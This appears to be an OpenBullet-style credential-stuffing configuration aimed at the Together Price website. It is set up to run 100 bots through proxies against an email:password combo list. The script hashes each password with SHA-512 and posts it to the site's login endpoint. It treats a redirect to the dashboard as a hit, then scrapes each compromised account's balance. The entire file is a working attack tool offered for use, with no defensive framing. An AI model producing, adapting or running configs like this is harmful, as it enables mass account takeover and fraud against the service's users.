[SETTINGS]
{
  "Name": "Together Price",
  "SuggestedBots": 100,
  "LastModified": "2018-05-06T10:41:04.0567209+00:00",
  "AdditionalInfo": "",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#HASH_PASS_SHA_512 FUNCTION Hash SHA512 "<PASS>" -> VAR "HASH" 
#LOGIN REQUEST POST "https://www.togetherprice.com/database/process_login_create.php" AutoRedirect=TRUE 
  CONTENT "email=<USER>&invite=&p=<HASH>&post=&post_num=&ref=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Referer: https://www.togetherprice.com/login.php?user=" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "dashboard.php" 
  KEYCHAIN Failure OR 
    KEY "password" 
#GET_DASHBOARD REQUEST GET "http://www.togetherprice.com/dashboard.php" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#CAPTURE_BALANCE PARSE "<SOURCE>" LR "id=\"togetherprice_preview\" style=\"font-size: 21px;font-family: Avenir, Helvetica Neue, Lato, Segoe UI, Helvetica, Arial, sans-serif;\">" "<" Recursive=FALSE -> CAP "Balance" "" "" 
